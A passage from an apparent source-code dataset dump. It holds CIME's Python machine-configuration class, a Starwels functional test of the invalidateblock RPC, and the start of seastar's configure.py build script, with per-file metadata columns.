supported_values = self.get_value(listname, attributes=attributes)
# if no match with attributes, try without
if supported_values is None:
supported_values = self.get_value(listname, attributes=None)
expect(supported_values is not None,
"No list found for " + listname + " on machine " + self.machine)
supported_values = supported_values.split(",") #pylint: disable=no-member
if reqval is None or reqval == "UNSET":
return supported_values[0]
for val in supported_values:
if val == reqval:
return reqval
return None
def get_default_compiler(self):
"""
Get the compiler to use from the list of COMPILERS
"""
cime_config = get_cime_config()
if cime_config.has_option('main','COMPILER'):
value = cime_config.get('main', 'COMPILER')
expect(self.is_valid_compiler(value), "User-selected compiler {} is not supported on machine {}".format(value, self.machine))
else:
value = self.get_field_from_list("COMPILERS")
return value
def get_default_MPIlib(self, attributes=None):
"""
Get the MPILIB to use from the list of MPILIBS
"""
return self.get_field_from_list("MPILIBS", attributes=attributes)
def is_valid_compiler(self,compiler):
"""
Check the compiler is valid for the current machine
>>> machobj = Machines(machine="edison")
>>> machobj.get_default_compiler()
'intel'
>>> machobj.is_valid_compiler("gnu")
True
>>> machobj.is_valid_compiler("nag")
False
"""
return self.get_field_from_list("COMPILERS", reqval=compiler) is not None
def is_valid_MPIlib(self, mpilib, attributes=None):
"""
Check the MPILIB is valid for the current machine
>>> machobj = Machines(machine="edison")
>>> machobj.is_valid_MPIlib("mpi-serial")
True
>>> machobj.is_valid_MPIlib("fake-mpi")
False
"""
return mpilib == "mpi-serial" or \
self.get_field_from_list("MPILIBS", reqval=mpilib, attributes=attributes) is not None
def has_batch_system(self):
"""
Return if this machine has a batch system
>>> machobj = Machines(machine="edison")
>>> machobj.has_batch_system()
True
>>> machobj.set_machine("melvin")
'melvin'
>>> machobj.has_batch_system()
False
"""
result = False
batch_system = self.get_optional_child("BATCH_SYSTEM", root=self.machine_node)
if batch_system is not None:
result = (self.text(batch_system) is not None and self.text(batch_system) != "none")
logger.debug("Machine {} has batch: {}".format(self.machine, result))
return result
def get_suffix(self, suffix_type):
node = self.get_optional_child("default_run_suffix")
if node is not None:
suffix_node = self.get_optional_child(suffix_type, root=node)
if suffix_node is not None:
return self.text(suffix_node)
return None
def set_value(self, vid, value, subgroup=None, ignore_type=True):
tmproot = self.root
self.root = self.machine_node
result = super(Machines, self).set_value(vid, value, subgroup=subgroup,
ignore_type=ignore_type)
self.root = tmproot
return result
def print_values(self):
# write out machines
machines = self.get_children("machine")
logger.info("Machines")
for machine in machines:
name = self.get(machine, "MACH")
desc = self.get_child("DESC", root=machine)
os_ = self.get_child("OS", root=machine)
compilers = self.get_child("COMPILERS", root=machine)
max_tasks_per_node = self.get_child("MAX_TASKS_PER_NODE", root=machine)
max_mpitasks_per_node = self.get_child("MAX_MPITASKS_PER_NODE", root=machine)
print( " {} : {} ".format(name , self.text(desc)))
print( " os ", self.text(os_))
print( " compilers ",self.text(compilers))
if max_mpitasks_per_node is not None:
print(" pes/node ",self.text(max_mpitasks_per_node))
if max_tasks_per_node is not None:
print(" max_tasks/node ",self.text(max_tasks_per_node))
def return_values(self):
# return a dictionary of machine info
machines = self.get_children("machine")
mach_dict = dict()
logger.info("Machines return values")
for machine in machines:
name = self.get(machine, "MACH")
desc = self.get_child("DESC", root=machine)
mach_dict[(name,"description")] = self.text(desc)
os_ = self.get_child("OS", root=machine)
mach_dict[(name,"os")] = self.text(os_)
compilers = self.get_child("COMPILERS", root=machine)
mach_dict[(name,"compilers")] = self.text(compilers)
max_tasks_per_node = self.get_child("MAX_TASKS_PER_NODE", root=machine)
if max_tasks_per_node is not None:
mach_dict[(name,"max_tasks_per_node")] = self.text(max_tasks_per_node)
max_mpitasks_per_node = self.get_child("MAX_MPITASKS_PER_NODE", root=machine)
if max_mpitasks_per_node is not None:
mach_dict[(name,"max_mpitasks_per_node")] = self.text( max_mpitasks_per_node)
return mach_dict
| 37.55618 | 140 | 0.608153 | from CIME.XML.standard_module_setup import *
from CIME.XML.generic_xml import GenericXML
from CIME.XML.files import Files
from CIME.utils import convert_to_unknown_type, get_cime_config
import socket
logger = logging.getLogger(__name__)
class Machines(GenericXML):
def __init__(self, infile=None, files=None, machine=None):
self.machine_node = None
self.machine = None
self.machines_dir = None
schema = None
if files is None:
files = Files()
if infile is None:
infile = files.get_value("MACHINES_SPEC_FILE")
schema = files.get_schema("MACHINES_SPEC_FILE")
logger.debug("Verifying using schema {}".format(schema))
self.machines_dir = os.path.dirname(infile)
GenericXML.__init__(self, infile, schema)
local_infile = os.path.join(os.environ.get("HOME"),".cime","config_machines.xml")
logger.debug("Infile: {}".format(local_infile))
if os.path.exists(local_infile):
GenericXML.read(self, local_infile, schema)
if machine is None:
if "CIME_MACHINE" in os.environ:
machine = os.environ["CIME_MACHINE"]
else:
cime_config = get_cime_config()
if cime_config.has_option("main", "machine"):
machine = cime_config.get("main", "machine")
if machine is None:
machine = self.probe_machine_name()
expect(machine is not None, "Could not initialize machine object from {} or {}".format(infile, local_infile))
self.set_machine(machine)
def get_child(self, name=None, attributes=None, root=None, err_msg=None):
if root is None:
root = self.machine_node
return super(Machines, self).get_child(name, attributes, root, err_msg)
def get_machines_dir(self):
return self.machines_dir
def get_machine_name(self):
return self.machine
def get_node_names(self):
nodes = self.get_children(root=self.machine_node)
node_names = []
for node in nodes:
node_names.append(self.name(node))
return node_names
def get_first_child_nodes(self, nodename):
nodes = self.get_children(nodename, root=self.machine_node)
return nodes
def list_available_machines(self):
machines = []
nodes = self.get_children("machine")
for node in nodes:
mach = self.get(node, "MACH")
machines.append(mach)
return machines
def probe_machine_name(self, warn=True):
names_not_found = []
nametomatch = socket.getfqdn()
machine = self._probe_machine_name_one_guess(nametomatch)
if machine is None:
names_not_found.append(nametomatch)
nametomatch = socket.gethostname()
machine = self._probe_machine_name_one_guess(nametomatch)
if machine is None:
names_not_found.append(nametomatch)
names_not_found_quoted = ["'" + name + "'" for name in names_not_found]
names_not_found_str = ' or '.join(names_not_found_quoted)
if warn:
logger.warning("Could not find machine match for {}".format(names_not_found_str))
return machine
def _probe_machine_name_one_guess(self, nametomatch):
machine = None
nodes = self.get_children("machine")
for node in nodes:
machtocheck = self.get(node, "MACH")
logger.debug("machine is " + machtocheck)
regex_str_node = self.get_optional_child("NODENAME_REGEX", root=node)
regex_str = machtocheck if regex_str_node is None else self.text(regex_str_node)
if regex_str is not None:
logger.debug("machine regex string is " + regex_str)
regex = re.compile(regex_str)
if regex.match(nametomatch):
logger.debug("Found machine: {} matches {}".format(machtocheck, nametomatch))
machine = machtocheck
break
return machine
def set_machine(self, machine):
if machine == "Query":
self.machine = machine
elif self.machine != machine or self.machine_node is None:
self.machine_node = super(Machines,self).get_child("machine", {"MACH" : machine}, err_msg="No machine {} found".format(machine))
self.machine = machine
return machine
def get_value(self, name, attributes=None, resolved=True, subgroup=None):
expect(self.machine_node is not None, "Machine object has no machine defined")
expect(subgroup is None, "This class does not support subgroups")
value = None
if name == "COMPILER":
value = self.get_default_compiler()
elif name == "MPILIB":
value = self.get_default_MPIlib(attributes)
else:
node = self.get_optional_child(name, root=self.machine_node, attributes=attributes)
if node is not None:
value = self.text(node)
if resolved:
if value is not None:
value = self.get_resolved_value(value)
elif name in os.environ:
value = os.environ[name]
value = convert_to_unknown_type(value)
return value
def get_field_from_list(self, listname, reqval=None, attributes=None):
expect(self.machine_node is not None, "Machine object has no machine defined")
supported_values = self.get_value(listname, attributes=attributes)
if supported_values is None:
supported_values = self.get_value(listname, attributes=None)
expect(supported_values is not None,
"No list found for " + listname + " on machine " + self.machine)
supported_values = supported_values.split(",")
if reqval is None or reqval == "UNSET":
return supported_values[0]
for val in supported_values:
if val == reqval:
return reqval
return None
def get_default_compiler(self):
cime_config = get_cime_config()
if cime_config.has_option('main','COMPILER'):
value = cime_config.get('main', 'COMPILER')
expect(self.is_valid_compiler(value), "User-selected compiler {} is not supported on machine {}".format(value, self.machine))
else:
value = self.get_field_from_list("COMPILERS")
return value
def get_default_MPIlib(self, attributes=None):
return self.get_field_from_list("MPILIBS", attributes=attributes)
def is_valid_compiler(self,compiler):
return self.get_field_from_list("COMPILERS", reqval=compiler) is not None
def is_valid_MPIlib(self, mpilib, attributes=None):
return mpilib == "mpi-serial" or \
self.get_field_from_list("MPILIBS", reqval=mpilib, attributes=attributes) is not None
def has_batch_system(self):
result = False
batch_system = self.get_optional_child("BATCH_SYSTEM", root=self.machine_node)
if batch_system is not None:
result = (self.text(batch_system) is not None and self.text(batch_system) != "none")
logger.debug("Machine {} has batch: {}".format(self.machine, result))
return result
def get_suffix(self, suffix_type):
node = self.get_optional_child("default_run_suffix")
if node is not None:
suffix_node = self.get_optional_child(suffix_type, root=node)
if suffix_node is not None:
return self.text(suffix_node)
return None
def set_value(self, vid, value, subgroup=None, ignore_type=True):
tmproot = self.root
self.root = self.machine_node
result = super(Machines, self).set_value(vid, value, subgroup=subgroup,
ignore_type=ignore_type)
self.root = tmproot
return result
def print_values(self):
machines = self.get_children("machine")
logger.info("Machines")
for machine in machines:
name = self.get(machine, "MACH")
desc = self.get_child("DESC", root=machine)
os_ = self.get_child("OS", root=machine)
compilers = self.get_child("COMPILERS", root=machine)
max_tasks_per_node = self.get_child("MAX_TASKS_PER_NODE", root=machine)
max_mpitasks_per_node = self.get_child("MAX_MPITASKS_PER_NODE", root=machine)
print( " {} : {} ".format(name , self.text(desc)))
print( " os ", self.text(os_))
print( " compilers ",self.text(compilers))
if max_mpitasks_per_node is not None:
print(" pes/node ",self.text(max_mpitasks_per_node))
if max_tasks_per_node is not None:
print(" max_tasks/node ",self.text(max_tasks_per_node))
def return_values(self):
machines = self.get_children("machine")
mach_dict = dict()
logger.info("Machines return values")
for machine in machines:
name = self.get(machine, "MACH")
desc = self.get_child("DESC", root=machine)
mach_dict[(name,"description")] = self.text(desc)
os_ = self.get_child("OS", root=machine)
mach_dict[(name,"os")] = self.text(os_)
compilers = self.get_child("COMPILERS", root=machine)
mach_dict[(name,"compilers")] = self.text(compilers)
max_tasks_per_node = self.get_child("MAX_TASKS_PER_NODE", root=machine)
if max_tasks_per_node is not None:
mach_dict[(name,"max_tasks_per_node")] = self.text(max_tasks_per_node)
max_mpitasks_per_node = self.get_child("MAX_MPITASKS_PER_NODE", root=machine)
if max_mpitasks_per_node is not None:
mach_dict[(name,"max_mpitasks_per_node")] = self.text( max_mpitasks_per_node)
return mach_dict
| true | true |
f725df17ca09efe9699ffac94afdaac33246a3bd | 2,794 | py | Python | test/functional/rpc_invalidateblock.py | 1185/starwels | 48800688ae90318ac6ed74796dde42ac283484e9 | [
"MIT"
] | null | null | null | test/functional/rpc_invalidateblock.py | 1185/starwels | 48800688ae90318ac6ed74796dde42ac283484e9 | [
"MIT"
] | null | null | null | test/functional/rpc_invalidateblock.py | 1185/starwels | 48800688ae90318ac6ed74796dde42ac283484e9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2019 The Starwels developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the invalidateblock RPC."""
from test_framework.test_framework import StarwelsTestFramework
from test_framework.util import *
class InvalidateTest(StarwelsTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
self.log.info("Make sure we repopulate setBlockIndexCandidates after InvalidateBlock:")
self.log.info("Mine 4 blocks on Node 0")
self.nodes[0].generate(4)
assert(self.nodes[0].getblockcount() == 4)
besthash = self.nodes[0].getbestblockhash()
self.log.info("Mine competing 6 blocks on Node 1")
self.nodes[1].generate(6)
assert(self.nodes[1].getblockcount() == 6)
self.log.info("Connect nodes to force a reorg")
connect_nodes_bi(self.nodes,0,1)
sync_blocks(self.nodes[0:2])
assert(self.nodes[0].getblockcount() == 6)
badhash = self.nodes[1].getblockhash(2)
self.log.info("Invalidate block 2 on node 0 and verify we reorg to node 0's original chain")
self.nodes[0].invalidateblock(badhash)
newheight = self.nodes[0].getblockcount()
newhash = self.nodes[0].getbestblockhash()
if (newheight != 4 or newhash != besthash):
raise AssertionError("Wrong tip for node0, hash %s, height %d"%(newhash,newheight))
self.log.info("Make sure we won't reorg to a lower work chain:")
connect_nodes_bi(self.nodes,1,2)
self.log.info("Sync node 2 to node 1 so both have 6 blocks")
sync_blocks(self.nodes[1:3])
assert(self.nodes[2].getblockcount() == 6)
self.log.info("Invalidate block 5 on node 1 so its tip is now at 4")
self.nodes[1].invalidateblock(self.nodes[1].getblockhash(5))
assert(self.nodes[1].getblockcount() == 4)
self.log.info("Invalidate block 3 on node 2, so its tip is now 2")
self.nodes[2].invalidateblock(self.nodes[2].getblockhash(3))
assert(self.nodes[2].getblockcount() == 2)
self.log.info("..and then mine a block")
self.nodes[2].generate(1)
self.log.info("Verify all nodes are at the right height")
time.sleep(5)
assert_equal(self.nodes[2].getblockcount(), 3)
assert_equal(self.nodes[0].getblockcount(), 4)
node1height = self.nodes[1].getblockcount()
if node1height < 4:
raise AssertionError("Node 1 reorged to a lower height: %d"%node1height)
if __name__ == '__main__':
InvalidateTest().main()
| 42.984615 | 100 | 0.659628 |
from test_framework.test_framework import StarwelsTestFramework
from test_framework.util import *
class InvalidateTest(StarwelsTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
self.log.info("Make sure we repopulate setBlockIndexCandidates after InvalidateBlock:")
self.log.info("Mine 4 blocks on Node 0")
self.nodes[0].generate(4)
assert(self.nodes[0].getblockcount() == 4)
besthash = self.nodes[0].getbestblockhash()
self.log.info("Mine competing 6 blocks on Node 1")
self.nodes[1].generate(6)
assert(self.nodes[1].getblockcount() == 6)
self.log.info("Connect nodes to force a reorg")
connect_nodes_bi(self.nodes,0,1)
sync_blocks(self.nodes[0:2])
assert(self.nodes[0].getblockcount() == 6)
badhash = self.nodes[1].getblockhash(2)
self.log.info("Invalidate block 2 on node 0 and verify we reorg to node 0's original chain")
self.nodes[0].invalidateblock(badhash)
newheight = self.nodes[0].getblockcount()
newhash = self.nodes[0].getbestblockhash()
if (newheight != 4 or newhash != besthash):
raise AssertionError("Wrong tip for node0, hash %s, height %d"%(newhash,newheight))
self.log.info("Make sure we won't reorg to a lower work chain:")
connect_nodes_bi(self.nodes,1,2)
self.log.info("Sync node 2 to node 1 so both have 6 blocks")
sync_blocks(self.nodes[1:3])
assert(self.nodes[2].getblockcount() == 6)
self.log.info("Invalidate block 5 on node 1 so its tip is now at 4")
self.nodes[1].invalidateblock(self.nodes[1].getblockhash(5))
assert(self.nodes[1].getblockcount() == 4)
self.log.info("Invalidate block 3 on node 2, so its tip is now 2")
self.nodes[2].invalidateblock(self.nodes[2].getblockhash(3))
assert(self.nodes[2].getblockcount() == 2)
self.log.info("..and then mine a block")
self.nodes[2].generate(1)
self.log.info("Verify all nodes are at the right height")
time.sleep(5)
assert_equal(self.nodes[2].getblockcount(), 3)
assert_equal(self.nodes[0].getblockcount(), 4)
node1height = self.nodes[1].getblockcount()
if node1height < 4:
raise AssertionError("Node 1 reorged to a lower height: %d"%node1height)
if __name__ == '__main__':
InvalidateTest().main()
| true | true |
f725dff5cb4fe0332ca1c2febb521e5f7662dff2 | 41,343 | py | Python | xdl/third_party/seastar/configure.py | Ru-Xiang/x-deeplearning | 04cc0497150920c64b06bb8c314ef89977a3427a | [
"Apache-2.0"
] | 4,071 | 2018-12-13T04:17:38.000Z | 2022-03-30T03:29:35.000Z | xdl/third_party/seastar/configure.py | laozhuang727/x-deeplearning | 781545783a4e2bbbda48fc64318fb2c6d8bbb3cc | [
"Apache-2.0"
] | 359 | 2018-12-21T01:14:57.000Z | 2022-02-15T07:18:02.000Z | xdl/third_party/seastar/configure.py | laozhuang727/x-deeplearning | 781545783a4e2bbbda48fc64318fb2c6d8bbb3cc | [
"Apache-2.0"
] | 1,054 | 2018-12-20T09:57:42.000Z | 2022-03-29T07:16:53.000Z | #!/usr/bin/env python3
#
# This file is open source software, licensed to you under the terms
# of the Apache License, Version 2.0 (the "License"). See the NOTICE file
# distributed with this work for additional information regarding copyright
# ownership. You may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os, os.path, textwrap, argparse, sys, shlex, subprocess, tempfile, re
configure_args = str.join(' ', [shlex.quote(x) for x in sys.argv[1:]])
tempfile.tempdir = "./build/tmp"
srcdir = os.getcwd()
def get_flags():
with open('/proc/cpuinfo') as f:
for line in f:
if line.strip():
if line.rstrip('\n').startswith('flags'):
return re.sub(r'^flags\s+: ', '', line).split()
def add_tristate(arg_parser, name, dest, help):
arg_parser.add_argument('--enable-' + name, dest = dest, action = 'store_true', default = None,
help = 'Enable ' + help)
arg_parser.add_argument('--disable-' + name, dest = dest, action = 'store_false', default = None,
help = 'Disable ' + help)
def apply_tristate(var, test, note, missing):
if (var is None) or var:
if test():
return True
elif var == True:
print(missing)
sys.exit(1)
else:
print(note)
return False
return False
#
# dpdk_cflags - fetch the DPDK specific CFLAGS
#
# Run a simple makefile that "includes" the DPDK main makefile and prints the
# MACHINE_CFLAGS value
#
def dpdk_cflags (dpdk_target):
ensure_tmp_dir_exists()
with tempfile.NamedTemporaryFile() as sfile:
dpdk_target = os.path.abspath(dpdk_target)
dpdk_target = re.sub(r'\/+$', '', dpdk_target)
dpdk_sdk_path = os.path.dirname(dpdk_target)
dpdk_target_name = os.path.basename(dpdk_target)
dpdk_arch = dpdk_target_name.split('-')[0]
if args.dpdk:
dpdk_sdk_path = 'dpdk'
dpdk_target = os.getcwd() + '/build/dpdk'
dpdk_target_name = 'x86_64-{}-linuxapp-gcc'.format(dpdk_machine)
dpdk_arch = 'x86_64'
sfile.file.write(bytes('include ' + dpdk_sdk_path + '/mk/rte.vars.mk' + "\n", 'utf-8'))
sfile.file.write(bytes('all:' + "\n\t", 'utf-8'))
sfile.file.write(bytes('@echo $(MACHINE_CFLAGS)' + "\n", 'utf-8'))
sfile.file.flush()
dpdk_cflags = subprocess.check_output(['make', '--no-print-directory',
'-f', sfile.name,
'RTE_SDK=' + dpdk_sdk_path,
'RTE_OUTPUT=' + dpdk_target,
'RTE_TARGET=' + dpdk_target_name,
'RTE_SDK_BIN=' + dpdk_target,
'RTE_ARCH=' + dpdk_arch])
dpdk_cflags_str = dpdk_cflags.decode('utf-8')
dpdk_cflags_str = re.sub(r'\n+$', '', dpdk_cflags_str)
dpdk_cflags_final = ''
return dpdk_cflags_str
def try_compile(compiler, source = '', flags = []):
return try_compile_and_link(compiler, source, flags = flags + ['-c'])
def ensure_tmp_dir_exists():
if not os.path.exists(tempfile.tempdir):
os.makedirs(tempfile.tempdir)
def try_compile_and_link(compiler, source = '', flags = []):
ensure_tmp_dir_exists()
with tempfile.NamedTemporaryFile() as sfile:
ofile = tempfile.mktemp()
try:
sfile.file.write(bytes(source, 'utf-8'))
sfile.file.flush()
# We can't write to /dev/null, since in some cases (-ftest-coverage) gcc will create an auxiliary
# output file based on the name of the output file, and "/dev/null.gcsa" is not a good name
return subprocess.call([compiler, '-x', 'c++', '-o', ofile, sfile.name] + args.user_cflags.split() + flags,
stdout = subprocess.DEVNULL,
stderr = subprocess.DEVNULL) == 0
finally:
if os.path.exists(ofile):
os.unlink(ofile)
def try_compile_and_run(compiler, flags, source, env = {}):
ensure_tmp_dir_exists()
mktemp = tempfile.NamedTemporaryFile
with mktemp() as sfile, mktemp(mode='rb') as xfile:
sfile.file.write(bytes(source, 'utf-8'))
sfile.file.flush()
xfile.file.close()
if subprocess.call([compiler, '-x', 'c++', '-o', xfile.name, sfile.name] + args.user_cflags.split() + flags,
stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL) != 0:
# The compiler may delete the target on failure, and lead to
# NamedTemporaryFile's destructor throwing an exception.
open(xfile.name, 'a').close()
return False
e = os.environ.copy()
e.update(env)
env = e
return subprocess.call([xfile.name], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL, env=env) == 0
def warning_supported(warning, compiler):
# gcc ignores -Wno-x even if it is not supported
adjusted = re.sub('^-Wno-', '-W', warning)
return try_compile(flags = [adjusted, '-Werror'], compiler = compiler)
def debug_flag(compiler):
src_with_auto = textwrap.dedent('''\
template <typename T>
struct x { auto f() {} };
x<int> a;
''')
if try_compile(source = src_with_auto, flags = ['-g', '-std=gnu++1y'], compiler = compiler):
return '-g'
else:
print('Note: debug information disabled; upgrade your compiler')
return ''
def sanitize_vptr_flag(compiler):
# https://gcc.gnu.org/bugzilla/show_bug.cgi?id=67258
if (not try_compile(compiler, flags=['-fsanitize=vptr'])
or (try_compile_and_run(compiler, flags=['-fsanitize=undefined', '-fno-sanitize-recover'],
env={'UBSAN_OPTIONS': 'exitcode=1'}, source=textwrap.dedent('''
struct A
{
virtual ~A() {}
};
struct B : virtual A {};
struct C : virtual A {};
struct D : B, virtual C {};
int main()
{
D d;
}
'''))
and False)): # -fsanitize=vptr is broken even when the test above passes
return ''
else:
print('Notice: -fsanitize=vptr is broken, disabling; some debug mode tests are bypassed.')
return '-fno-sanitize=vptr'
def adjust_visibility_flags(compiler):
# https://gcc.gnu.org/bugzilla/show_bug.cgi?id=80947
flags = ['-fvisibility=hidden', '-std=gnu++1y', '-Werror=attributes']
if not try_compile(compiler, flags=flags, source=textwrap.dedent('''
template <class T>
class MyClass {
public:
MyClass() {
auto outer = [this] ()
{
auto fn = [this] { };
//use fn for something here
};
}
};
int main() {
MyClass<int> r;
}
''')):
print('Notice: disabling -Wattributes due to https://gcc.gnu.org/bugzilla/show_bug.cgi?id=80947')
return '-Wno-attributes'
else:
return ''
modes = {
'debug': {
'sanitize': '-fsanitize=address -fsanitize=leak -fsanitize=undefined',
'sanitize_libs': '-lasan -lubsan',
'opt': '-O0 -DDEBUG -DDEBUG_SHARED_PTR -DDEFAULT_ALLOCATOR -DSEASTAR_THREAD_STACK_GUARDS -DNO_EXCEPTION_HACK',
'libs': '',
'cares_opts': '-DCARES_STATIC=ON -DCARES_SHARED=OFF -DCMAKE_BUILD_TYPE=Debug',
},
'release': {
'sanitize': '',
'sanitize_libs': '',
'opt': '-O2 -DNDEBUG -DDEFAULT_ALLOCATOR',
'libs': '',
'cares_opts': '-DCARES_STATIC=ON -DCARES_SHARED=OFF -DCMAKE_BUILD_TYPE=Release',
},
}
tests = [
'tests/fileiotest',
'tests/directory_test',
'tests/linecount',
'tests/echotest',
'tests/l3_test',
'tests/ip_test',
'tests/timertest',
'tests/tcp_test',
'tests/futures_test',
'tests/alloc_test',
'tests/foreign_ptr_test',
'tests/smp_test',
'tests/thread_test',
'tests/thread_context_switch',
'tests/udp_server',
'tests/udp_client',
'tests/blkdiscard_test',
'tests/sstring_test',
'tests/unwind_test',
'tests/defer_test',
'tests/httpd',
'tests/memcached/test_ascii_parser',
'tests/tcp_sctp_server',
'tests/tcp_sctp_client',
'tests/allocator_test',
'tests/output_stream_test',
'tests/udp_zero_copy',
'tests/shared_ptr_test',
'tests/weak_ptr_test',
'tests/checked_ptr_test',
'tests/slab_test',
'tests/fstream_test',
'tests/distributed_test',
'tests/rpc',
'tests/semaphore_test',
'tests/expiring_fifo_test',
'tests/packet_test',
'tests/tls_test',
'tests/fair_queue_test',
'tests/rpc_test',
'tests/connect_test',
'tests/chunked_fifo_test',
'tests/circular_buffer_test',
'tests/perf/perf_fstream',
'tests/json_formatter_test',
'tests/dns_test',
'tests/execution_stage_test',
'tests/lowres_clock_test',
'tests/program_options_test',
'tests/tuple_utils_test',
'tests/tls_echo_server',
'tests/tls_simple_client',
'tests/circular_buffer_fixed_capacity_test',
'tests/noncopyable_function_test',
]
apps = [
'apps/httpd/httpd',
'apps/seawreck/seawreck',
'apps/fair_queue_tester/fair_queue_tester',
'apps/memcached/memcached',
'apps/iotune/iotune',
'tests/scheduling_group_demo',
]
all_artifacts = apps + tests + ['libseastar.a', 'seastar.pc']
arg_parser = argparse.ArgumentParser('Configure seastar')
arg_parser.add_argument('--static', dest = 'static', action = 'store_const', default = '',
const = '-static',
help = 'Static link (useful for running on hosts outside the build environment)')
arg_parser.add_argument('--embedded-static', dest = 'embedded_static', action = 'store_const', default = '',
const = '-embedded-static',
help = 'Static link with -fPIC (can be embedded in a shared library)')
arg_parser.add_argument('--pie', dest = 'pie', action = 'store_true',
help = 'Build position-independent executable (PIE)')
arg_parser.add_argument('--so', dest = 'so', action = 'store_true',
help = 'Build shared object (SO) instead of executable')
arg_parser.add_argument('--mode', action='store', choices=list(modes.keys()) + ['all'], default='all')
arg_parser.add_argument('--with', dest='artifacts', action='append', choices=all_artifacts, default=[])
arg_parser.add_argument('--cflags', action = 'store', dest = 'user_cflags', default = '',
help = 'Extra flags for the C++ compiler')
arg_parser.add_argument('--ldflags', action = 'store', dest = 'user_ldflags', default = '',
help = 'Extra flags for the linker')
arg_parser.add_argument('--compiler', action = 'store', dest = 'cxx', default = 'g++',
help = 'C++ compiler path')
arg_parser.add_argument('--c-compiler', action='store', dest='cc', default='gcc',
help = 'C compiler path (for bundled libraries such as dpdk and c-ares)')
arg_parser.add_argument('--with-osv', action = 'store', dest = 'with_osv', default = '',
help = 'Shortcut for compile for OSv')
arg_parser.add_argument('--enable-dpdk', action = 'store_true', dest = 'dpdk', default = False,
help = 'Enable dpdk (from included dpdk sources)')
arg_parser.add_argument('--dpdk-target', action = 'store', dest = 'dpdk_target', default = '',
help = 'Path to DPDK SDK target location (e.g. <DPDK SDK dir>/x86_64-native-linuxapp-gcc)')
arg_parser.add_argument('--debuginfo', action = 'store', dest = 'debuginfo', type = int, default = 1,
help = 'Enable(1)/disable(0)compiler debug information generation')
arg_parser.add_argument('--tests-debuginfo', action='store', dest='tests_debuginfo', type=int, default=0,
help='Enable(1)/disable(0)compiler debug information generation for tests')
arg_parser.add_argument('--static-stdc++', dest = 'staticcxx', action = 'store_true',
help = 'Link libgcc and libstdc++ statically')
arg_parser.add_argument('--static-boost', dest = 'staticboost', action = 'store_true',
help = 'Link with boost statically')
add_tristate(arg_parser, name = 'hwloc', dest = 'hwloc', help = 'hwloc support')
arg_parser.add_argument('--enable-gcc6-concepts', dest='gcc6_concepts', action='store_true', default=False,
help='enable experimental support for C++ Concepts as implemented in GCC 6')
add_tristate(arg_parser, name = 'exception-scalability-workaround', dest='exception_workaround',
help='disabling override of dl_iterate_phdr symbol to workaround C++ exception scalability issues')
arg_parser.add_argument('--allocator-page-size', dest='allocator_page_size', type=int, help='override allocator page size')
args = arg_parser.parse_args()
libnet = [
'net/proxy.cc',
'net/virtio.cc',
'net/dpdk.cc',
'net/ip.cc',
'net/ethernet.cc',
'net/arp.cc',
'net/native-stack.cc',
'net/ip_checksum.cc',
'net/udp.cc',
'net/tcp.cc',
'net/dhcp.cc',
'net/tls.cc',
'net/dns.cc',
]
core = [
'core/reactor.cc',
'core/systemwide_memory_barrier.cc',
'core/fstream.cc',
'core/posix.cc',
'core/memory.cc',
'core/resource.cc',
'core/scollectd.cc',
'core/metrics.cc',
'core/app-template.cc',
'core/thread.cc',
'core/dpdk_rte.cc',
'core/fsqual.cc',
'util/conversions.cc',
'util/program-options.cc',
'util/log.cc',
'util/backtrace.cc',
'net/packet.cc',
'net/posix-stack.cc',
'net/net.cc',
'net/stack.cc',
'net/inet_address.cc',
'rpc/rpc.cc',
'rpc/lz4_compressor.cc',
'core/exception_hacks.cc',
]
protobuf = [
'proto/metrics2.proto',
]
#prometheus = [
# 'core/prometheus.cc',
# ]
http = ['http/transformers.cc',
'http/json_path.cc',
'http/file_handler.cc',
'http/common.cc',
'http/routes.cc',
'json/json_elements.cc',
'json/formatter.cc',
'http/matcher.cc',
'http/mime_types.cc',
'http/httpd.cc',
'http/reply.cc',
'http/request_parser.rl',
'http/api_docs.cc',
]
boost_test_lib = [
'tests/test-utils.cc',
'tests/test_runner.cc',
]
def maybe_static(flag, libs):
if flag and not args.static:
libs = '-Wl,-Bstatic {} -Wl,-Bdynamic'.format(libs)
return libs
defines = ['FMT_HEADER_ONLY']
# Include -lgcc_s before -lunwind to work around for https://savannah.nongnu.org/bugs/?48486. See https://github.com/scylladb/scylla/issues/1725.
libs = ' '.join(['-laio',
maybe_static(args.staticboost,
'-lboost_program_options -lboost_system -lboost_filesystem'),
'-lstdc++ -lm',
maybe_static(args.staticboost, '-lboost_thread'),
'-lcryptopp -lrt -lgnutls -lgnutlsxx -llz4 -lprotobuf -ldl -lgcc_s -lunwind',
])
boost_unit_test_lib = maybe_static(args.staticboost, '-lboost_unit_test_framework')
hwloc_libs = '-lhwloc -lnuma -lpciaccess -lxml2 -lz'
if args.gcc6_concepts:
defines.append('HAVE_GCC6_CONCEPTS')
args.user_cflags += ' -fconcepts'
if not apply_tristate(args.exception_workaround, test = lambda: not args.staticcxx and not args.static,
note = "Note: disabling exception scalability workaround due to static linkage of libgcc and libstdc++",
missing = "Error: cannot enable exception scalability workaround with static linkage of libgcc and libstdc++"):
defines.append('NO_EXCEPTION_HACK')
if args.staticcxx:
libs = libs.replace('-lstdc++', '')
libs += ' -static-libgcc -static-libstdc++'
if args.staticcxx or args.static:
defines.append("NO_EXCEPTION_INTERCEPT");
memcache_base = [
'apps/memcached/ascii.rl'
] + libnet + core
deps = {
'libseastar.a' : core + libnet + http, # + protobuf + prometheus,
'seastar.pc': [],
'apps/httpd/httpd': ['apps/httpd/demo.json', 'apps/httpd/main.cc'] + http + libnet + core,
'apps/memcached/memcached': ['apps/memcached/memcache.cc'] + memcache_base,
'tests/memcached/test_ascii_parser': ['tests/memcached/test_ascii_parser.cc'] + memcache_base,
'tests/fileiotest': ['tests/fileiotest.cc'] + core,
